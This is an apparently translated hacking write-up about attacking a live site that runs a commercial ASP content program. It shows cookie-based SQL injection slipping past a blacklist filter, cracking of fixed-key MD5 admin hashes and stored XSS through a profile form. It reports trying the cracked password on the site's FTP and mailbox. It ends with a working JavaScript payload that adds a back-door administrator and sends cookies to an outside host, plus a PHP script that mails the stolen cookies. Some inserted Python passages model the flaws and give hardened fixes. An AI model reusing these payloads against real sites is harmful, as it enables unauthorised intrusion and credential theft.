First I skimmed the overall structure of the website and found it wasn't the kind of throwaway corporate site that falls in five minutes.
Sites in the same line of business turned out to run the same program.
I couldn't be bothered with the C segment (neighbouring hosts in the same /24), because the chance of being able to ARP-sniff inside the IDC where the site is hosted is slimmer than the Chinese football team's chances at the World Cup.
Then again, the company I did foreign trade for last year seems to have used this program. At the time I only skimmed it and did not see any serious vulnerabilities.
Recently work was slow, so a colleague and I went through the program's source code.
We found the following security issues.
In new.asp:
```asp
<!-- #include file="top.asp" -->
<%
page = clng(request("page"))
Set rs = Server.CreateObject("ADODB.RecordSet")
' request("type") is read without naming a collection and concatenated straight into the SQL
SQL = "select * from member_news where type='" & request("type") & "' order by order0 desc"
rs.Open SQL, conn, 1, 1
if rs.eof and rs.bof then
    response.Write("No news!")
else
%>
```
top.asp includes inc/sql.asp, whose content is:
```asp
<%
'SQL filtering
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
'custom strings to filter, separated by "|"
Fy_In = "'|;|[|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
'----------------------------------
Fy_Inf = split(Fy_In, "|")
'-------- POST part ------------------
If Request.Form <> "" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh = 0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
                response.write "<script>alert('sorry for you put which including irregular symbol: " & Fy_Inf(Fy_Xh) & "');history.go(-1);</script>"
                response.end
            End If
        Next
    Next
End If
'-------- GET part -------------------
If Request.QueryString <> "" Then
    For Each Fy_Get In Request.QueryString
        For Fy_Xh = 0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh)) <> 0 Then
                response.write "<script>alert('sorry for you put which including irregular symbol: " & Fy_Inf(Fy_Xh) & "');history.go(-1);</script>"
                response.end
            End If
        Next
    Next
End If
%>
```
Dude, why didn't you look at cookies? The filter only walks Request.Form and Request.QueryString, but new.asp calls request("type") without naming a collection, and an unqualified Request() also reads Request.Cookies. So a value supplied in a cookie reaches the SQL string without ever passing through the filter.
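To make that gap concrete, here is an added Python model (not the project's ASP) of the unqualified request("type") lookup order and the Form/QueryString-only blacklist from inc/sql.asp, with an assumed hardened version beside it; the request dictionaries are constructed:

```python
import re

# Blacklist copied from inc/sql.asp (the spaces the page shows are extraction noise)
FY_IN = "'|;|[|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
FY_INF = FY_IN.split("|")

# Classic ASP's unqualified Request("name") searches these collections in this order
REQUEST_ORDER = ("QueryString", "Form", "Cookies", "ClientCertificate", "ServerVariables")


def sql_asp_filter(request):
    """Model of inc/sql.asp: only Form and QueryString are inspected.
    Returns the first blacklisted token found, or None if the request passes."""
    for collection in ("Form", "QueryString"):
        for value in request.get(collection, {}).values():
            lowered = value.lower()
            for token in FY_INF:
                if token in lowered:
                    return token
    return None


def unqualified_request(request, name):
    """Model of request("name") with no collection given: first collection holding it wins."""
    for collection in REQUEST_ORDER:
        if name in request.get(collection, {}):
            return request[collection][name]
    return ""


def news_sql_as_written(request):
    """new.asp as shipped: blacklist first, then string concatenation of request("type").
    Returns the SQL text, or None where the filter would have called response.end."""
    if sql_asp_filter(request) is not None:
        return None
    return ("select * from member_news where type='"
            + unqualified_request(request, "type") + "' order by order0 desc")


def news_sql_hardened(request):
    """Assumed defensive rewrite, not the project's code: read only the intended
    collection, allow-list the value's shape, and bind it as a query parameter
    instead of concatenating. Returns (sql, params), or None when rejected."""
    news_type = request.get("QueryString", {}).get("type", "")
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", news_type):
        return None
    return ("select * from member_news where type=? order by order0 desc", (news_type,))


# Constructed requests: the same quote-bearing value sent two different ways
REQ_VIA_QUERYSTRING = {"QueryString": {"page": "1", "type": "a'b"}}
REQ_VIA_COOKIE = {"QueryString": {"page": "1"}, "Cookies": {"type": "a'b"}}
```

The quote in the query-string variant is caught, while the identical value in a cookie is never inspected and lands inside the SQL literal.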
The key back-end login code, admin/login.asp:
```asp
md5key = "pjfmd5"
if request("action") = "login" then
    admin_name = trim(request("admin_name"))
    ' one fixed key appended to every password, then a single unsalted MD5
    admin_pass = md5(trim(request("admin_pass")) & md5key)
```
So the hash pulled out through the injection is md5(password & "pjfmd5"); hand it to a hash-cracking service and what comes back has the form:
Xxooxxoo:pjfmd5
i.e. the password with the fixed key appended, in plain text.
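Why the fixed key is no protection, as an added Python illustration (not the project's code): the legacy scheme from admin/login.asp beside an assumed per-user-salted PBKDF2 replacement; the wordlist is constructed.

```python
import hashlib
import hmac
import os

MD5KEY = "pjfmd5"  # the fixed key from admin/login.asp


def legacy_hash(password):
    """admin/login.asp scheme: md5(password & md5key). Same input, same output,
    for every user and every site running this program."""
    return hashlib.md5((password + MD5KEY).encode("utf-8")).hexdigest()


def legacy_lookup(stored_hash, wordlist):
    """Why a fixed key is not a salt: one precomputed table of md5(word + key)
    covers every account at once. Returns the matching word or None."""
    table = {legacy_hash(word): word for word in wordlist}
    return table.get(stored_hash)


def hardened_hash(password, salt=None, iterations=200_000):
    """Assumed replacement, not the project's code: per-user random salt plus an
    iterated KDF (PBKDF2-HMAC-SHA256), stored as 'pbkdf2_sha256$iter$salt$digest'."""
    salt = salt if salt is not None else os.urandom(16).hex()
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt.encode("utf-8"), iterations).hex()
    return f"pbkdf2_sha256${iterations}${salt}${digest}"


def hardened_verify(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt, digest = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hardened_hash(password, salt, int(iterations)).split("$")[3]
    return hmac.compare_digest(candidate, digest)


# Constructed sample wordlist
WORDLIST = ["123456", "password", "admin888"]
```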
Then came the injection itself. To be safe we tested it locally first, and the results were promising.
On the real site, however, a hacker had already changed the back end, and we tried the password against FTP and the mailbox.
So we kept digging.
Half an hour later we found inc/modify.asp, with the following code:
```asp
if request.Form("submit") <> "" then
    set rs = server.createobject("adodb.recordset")
    SQL = "select * from [user] where User_Name='" & session("user_name") & "'"
    rs.open SQL, conn, 1, 3
    if rs.eof and rs.bof then
        response.write "<SCRIPT>alert('Sorry, this User_name not exist! Please check it');history.back(-1)</SCRIPT>"
        response.end()
    else
        for I = 2 to rs.fields.count-1
            if rs.fields(I).Name = "Password2" then
            elseif rs.fields(I).Name = "Country" then
                rs(rs.fields(I).Name) = split(countrystr, ",")(request.Form(rs.fields(I).Name))
            elseif rs.fields(I).Name = "Password" and (request.Form(rs.fields(I).Name) <> rs("password")) then
                response.Write "<SCRIPT>alert('you have Changed the password!');</SCRIPT>"
                rs(rs.fields(I).Name) = md5(request.Form(rs.fields(I).Name) & md5key)
            elseif rs.fields(I).Name = "sex" then
                rs(rs.fields(I).Name) = ("" <> (request.Form(rs.fields(I).Name)))
            else
                ' every other field is written to the record exactly as submitted
                rs(rs.fields(I).Name) = (request.Form(rs.fields(I).Name))
            end if 'Save information
        next
        rs.update
        rs.close
    end if
    response.Write "<SCRIPT>alert('modify success!');Location='Log.asp'</SCRIPT>"
    response.End()
end if %>
```
The submitted fields are not sanitised at all; they go straight into the database. In other words, we can store our JS through the profile form.
OK, let's keep going and see where the back end pulls that data out:
/Admin/member/6pjf.asp
```asp
elseif request("ac") = "member management" then
    ' .............
    call rstotable(tcol_tname, where_order, "user", 20, temptitle, "6pjfadd.asp", "id", "yes")
```
The rstotable function writes the data out without any filtering or encoding.
Test
Haha, laugh
Given these conditions, a JS exploit was written that:
adds an administrator, and
sends the cookies to my QQ mailbox. Then wait for results.
The JS code is:
```javascript
document.write('abama');
var xmlHttp;
if (window.ActiveXObject) {
    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
else if (window.XMLHttpRequest) {
    xmlHttp = new XMLHttpRequest();
}

function validateForm() {
    str = window.location.pathname;
    var strs = new Array();
    strs = str.split("/");
    x = strs[1];
    var url = "/" + x + "/member/6pjfadd.asp?ac=%ba%f3%cc%a8%d5%ca%ba%c5%c9%e8%d6%c3";
    var params = "admin_name=yezi&admin_pass=fuckyou&admin_alow=%C0%CF%B0%E5&addtime=2012-5-31+4%3A55%3A59&submit=%CC%ED%BC%D3%BC%C7%C2%BC&refer=" + document.referrer;
    xmlHttp.open("POST", url, true);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlHttp.setRequestHeader("Content-length", params.length);
    xmlHttp.setRequestHeader("Connection", "close");
    xmlHttp.onreadystatechange = function () {
        if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
            // alert(xmlHttp.responseText);
        }
    }
    xmlHttp.send(params);
}
validateForm();
(function () {
    var a = document.createElement('script');
    a.setAttribute('type', 'text/javascript');
    a.setAttribute('src', 'http://yezi.us/xss.php?cookie=' + document.cookie);
    document.getElementsByTagName('head').item(0).appendChild();

})()
```
The xss.php code is:
```php
<?php
date_default_timezone_set('Asia/Shanghai');
$a = @$_GET['cooker'];
$ref = $_SERVER['HTTP_REFERER'];
$data = $a . "---cookie" . "\r\n" . $ref . "---referer" . "\r\n";
$to = '2017****@qq.com';
$subject = 'you have something From: ' . $ref;
$body = "\n-------URL=" . $ref . "\n-------Time=" . date("Y-m-d H:i:s") . "\n-------Data=" . $data . "\n----------------------------------------------";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=UTF-8' . "\r\n";
$headers .= "Here Come Some Password";
if (!empty($a)) {
    $sendmail = @mail($to, $subject, $body, $headers);
    if (!$sendmail) {
        @$file = fopen('xsstest.txt', 'a+');
        @$write = fwrite($file, $a . $ref . $data . "\r\n");
        @fclose($file);
    }
} else {
    echo "Hey, man, What r u doing?";
}
?>
```
From yezi.us